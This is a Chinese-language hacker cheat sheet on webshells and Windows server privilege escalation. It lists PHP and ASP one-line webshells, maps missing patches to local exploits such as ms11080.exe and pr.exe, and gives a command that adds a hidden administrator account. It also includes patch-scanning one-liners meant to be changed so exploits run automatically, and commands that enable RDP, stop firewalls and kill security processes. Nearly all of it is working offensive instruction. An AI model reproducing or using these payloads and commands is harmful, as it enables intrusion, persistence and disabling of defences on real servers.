判别木马

eval (base64_decode($_POST["php"]));

<?php @eval($_POST[sb])?>

<%eval request("sb")%>

Eval(Request(chr(35)))

<%ExecuteGlobal request("sb")%>

<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

systeminfo命令查看下是否有未补丁漏洞，或者通过查询c:windows 里留下的补丁号.log来看看服务器大概打了哪些补丁

KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB944653 MS07-067
KB952004 MS09-012   pr

KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011  ms11011.exe
kb942831 MS08-005
KB2503665 MS11-046  ms11046.exe

KB2592799 MS11-080  ms11080.exe

没打补丁的话,会被上传恶心的exploit.

当asp不支持WScript时候.而支持aspx的脚本时候就会用aspx，因为Aspx webshell是调用.net的组件来运行cmd命令的.

Aspxspy还有一个反弹的 端口映射

/c C:RECYCLER ms11080.exe 

Pr的使用方法就是 文件所在的路径 + “cmd命令” ps:要注意有””双引号!!.

C:RECYCLER pr.exe "net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add"

若是执行pr,为什么不回显呢?
因为上传的文件的路径 文件夹里面有 空格c:Documents and Settings 所以一般会被放到C:RECYCLER

接着就被查看3389的端口.点击读取注册表,读取HK_L_M SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber
这个键里面的值.

附录1.

IIS6.0下将webshell提升为system用户权限的方法:进入应用程序池-属性-标识：将标识里面的预定义账号设为:本地系统 （代表webshell具有system用户权限）或者选用那个”IWAM_主机名”用户，再用clone5.exe程序克隆“IWAM_主机名”用户

你可以把“@echo %i Not Installed!” 换成 “%i.exe Parameters“，就可以自动提权了（没换是检测那个漏洞）……

systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find /i  "%i" ||@echo %i Not Installed!)&del /f /q /a a.txt

dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

3.3389连接不上的解决方法
如果直接连接连接不上的话,有可能是以下几种情况以及解决方法

1.远程桌面服务没开启
可以把
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
保存成bat文件在cmd下找个可写目录然后以system权限运行.
2.IP策略阻拦
sc stop policyagent
3.windows自带防火墙阻拦
net stop sharedaccess
4.其他防火墙阻拦
tasklist /svc此命令可以获取每个进程中主持的服务
看到哪个不是系统自带的服务或者正在运行的进程
用ntsd -c q -pn xxx.exe 和 net stop 还有sc stop 这几个命令以system权限xx掉它.
5.内网
可以通过lcx等转发工具.